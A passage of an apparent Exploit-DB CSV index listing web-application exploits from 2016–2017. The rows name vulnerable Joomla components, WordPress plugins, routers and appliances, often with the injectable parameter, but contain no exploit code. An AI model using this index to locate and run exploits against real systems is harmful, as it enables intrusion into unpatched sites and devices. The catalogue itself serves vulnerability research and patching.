Sencan",webapps,php, +41345,exploits/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41346,exploits/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41347,exploits/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41359,exploits/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",webapps,php, +41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware, +41361,exploits/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,webapps,hardware, +41362,exploits/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php, +41368,exploits/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php, +41371,exploits/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",webapps,php, +41372,exploits/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",webapps,php, +41373,exploits/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",webapps,php, +41374,exploits/php/webapps/41374.txt,"Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection",2017-02-16,"Ihsan Sencan",webapps,php, +41376,exploits/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",webapps,php, +41377,exploits/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",webapps,php,80 +41378,exploits/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",webapps,php, +41379,exploits/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' SQL Injection",2017-02-17,"Ihsan Sencan",webapps,php, +41380,exploits/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",webapps,php, +41382,exploits/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' SQL Injection",2017-02-17,"Ihsan Sencan",webapps,php, +41383,exploits/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41384,exploits/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41385,exploits/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41386,exploits/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41387,exploits/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41388,exploits/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41389,exploits/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41390,exploits/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",webapps,php, +41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, +41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware, +41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,webapps,windows, +41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,webapps,php, +41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php, +41400,exploits/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php, +41401,exploits/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,webapps,ios, +41402,exploits/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",webapps,hardware, +41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",webapps,php, +41404,exploits/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,webapps,hardware, +41405,exploits/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41406,exploits/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41407,exploits/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41408,exploits/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41409,exploits/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41410,exploits/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41411,exploits/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41412,exploits/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",webapps,php, +41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php, +41414,exploits/linux/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,linux, +41415,exploits/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,webapps,hardware, +41416,exploits/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,webapps,hardware, +41424,exploits/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",webapps,php, +41427,exploits/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' SQL Injection",2017-02-22,"Ihsan Sencan",webapps,php, +41428,exploits/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",webapps,php, +41429,exploits/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",webapps,php, +41430,exploits/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",webapps,php, +41431,exploits/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",webapps,php, +41432,exploits/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,webapps,ios, +41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php, +41437,exploits/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,webapps,linux, +41438,exploits/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",webapps,php, +41440,exploits/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",webapps,php, +41441,exploits/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",webapps,php, +41442,exploits/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",webapps,php, +41444,exploits/php/webapps/41444.txt,"Joomla! Component JooDatabase 3.1.0 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41445,exploits/php/webapps/41445.txt,"Joomla! Component JO Facebook Gallery 4.5 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41446,exploits/php/webapps/41446.txt,"Joomla! Component AJAX Search for K2 2.2 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41447,exploits/php/webapps/41447.txt,"Joomla! Component Community Surveys 4.3 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41448,exploits/php/webapps/41448.txt,"Joomla! Component Community Polls 4.5.0 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41449,exploits/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,macos, +41450,exploits/php/webapps/41450.txt,"Joomla! Component GPS Tools 4.0.1 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41451,exploits/multiple/webapps/41451.html,"Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass",2017-02-24,"Google Security Research",webapps,multiple, +41452,exploits/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",webapps,php, +41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,multiple, +41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,webapps,php, +41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware, +41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple, +41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41463,exploits/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41464,exploits/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, +41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java, +41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",webapps,php, +41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware, +41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",webapps,hardware, +41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, +41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",webapps,xml, +41483,exploits/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",webapps,php,80 +41484,exploits/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",webapps,php,80 +41485,exploits/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",webapps,php,80 +41486,exploits/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",webapps,php,80 +41487,exploits/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",webapps,php,80 +41488,exploits/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",webapps,php,80 +41489,exploits/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",webapps,php, +41490,exploits/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",webapps,php, +41491,exploits/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' SQL Injection",2017-03-01,"Ihsan Sencan",webapps,php, +41493,exploits/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, +41494,exploits/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, +41495,exploits/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, +41496,exploits/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, +41497,exploits/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,webapps,php, +41499,exploits/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,webapps,jsp, +41500,exploits/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",webapps,php, +41501,exploits/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",webapps,php, +41502,exploits/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",webapps,hardware, +41504,exploits/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",webapps,php, +41505,exploits/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' SQL Injection",2017-03-04,"Ihsan Sencan",webapps,php, +41506,exploits/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",webapps,php, +41507,exploits/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",webapps,php, +41508,exploits/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' SQL Injection",2017-03-04,"Ihsan Sencan",webapps,php, +41512,exploits/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41513,exploits/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41514,exploits/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41515,exploits/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41516,exploits/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41517,exploits/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41518,exploits/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41519,exploits/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41520,exploits/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41521,exploits/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41522,exploits/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41523,exploits/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41524,exploits/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41525,exploits/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41526,exploits/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41527,exploits/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41528,exploits/php/webapps/41528.txt,"MLM Forex Market Plan Script 2.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41529,exploits/php/webapps/41529.txt,"MLM Membership Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41530,exploits/php/webapps/41530.txt,"Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41531,exploits/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41532,exploits/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41533,exploits/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41534,exploits/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41535,exploits/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41536,exploits/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41539,exploits/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, +41540,exploits/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php, +41541,exploits/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",webapps,json, +41543,exploits/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, +41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, +41546,exploits/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,webapps,aix, +41548,exploits/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41549,exploits/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41551,exploits/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41552,exploits/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41553,exploits/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php, +41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple, +41556,exploits/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41559,exploits/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41560,exploits/php/webapps/41560.txt,"Nlance 2.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41562,exploits/php/webapps/41562.txt,"Fashmark 1.2 - 'category' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41563,exploits/php/webapps/41563.txt,"TradeMart 1.1 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41564,exploits/php/webapps/41564.php,"Drupal 7.x Module Services - Remote Code Execution",2017-03-09,"Charles Fol",webapps,php, +41566,exploits/php/webapps/41566.txt,"WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php, +41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php, +41569,exploits/php/webapps/41569.txt,"WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php, +41570,exploits/linux/webapps/41570.py,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution",2017-03-07,"Vex Woo",webapps,linux, +41571,exploits/hardware/webapps/41571.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting",2017-03-08,"Bruno Bierbaumer",webapps,hardware, +41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",webapps,hardware, +41573,exploits/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",webapps,hardware, +41574,exploits/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,webapps,xml,52986 +42393,exploits/php/webapps/42393.txt,"VehicleWorkshop - SQL Injection",2017-07-28,"Shahab Shamsi",webapps,php, +42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple, +41577,exploits/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",webapps,jsp, +41579,exploits/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,webapps,xml, +41578,exploits/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",webapps,cgi, +41580,exploits/php/webapps/41580.pl,"e107 < 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,webapps,php, +41582,exploits/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41583,exploits/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41584,exploits/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",webapps,php, +41585,exploits/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41593,exploits/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41587,exploits/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41588,exploits/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41589,exploits/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41590,exploits/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41591,exploits/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php, +41594,exploits/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,webapps,php, +41599,exploits/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection",2017-03-14,"Ihsan Sencan",webapps,php, +41600,exploits/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection",2017-03-14,"Ihsan Sencan",webapps,php, +41602,exploits/php/webapps/41602.txt,"Joomla! Component Vik Appointments 1.5 - SQL Injection",2017-03-15,"Ihsan Sencan",webapps,php, +41603,exploits/php/webapps/41603.txt,"Joomla! Component Vik Rent Items 1.3 - SQL Injection",2017-03-15,"Ihsan Sencan",webapps,php, +41604,exploits/php/webapps/41604.txt,"Joomla! Component Vik Rent Car 1.11 - SQL Injection",2017-03-15,"Ihsan Sencan",webapps,php, +41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby, +41617,exploits/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,webapps,php, +41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx, +41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php, +41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, +41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware, +41627,exploits/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",webapps,php, +41628,exploits/linux/webapps/41628.py,"Cobbler 2.8.0 - Authenticated Remote Code Execution",2017-03-16,"Dolev Farhi",webapps,linux, +41632,exploits/php/webapps/41632.txt,"iFdate Social Dating Script 2.0 - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php, +41633,exploits/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,webapps,hardware, +41634,exploits/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php, +41636,exploits/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",webapps,php, +41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, +41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL 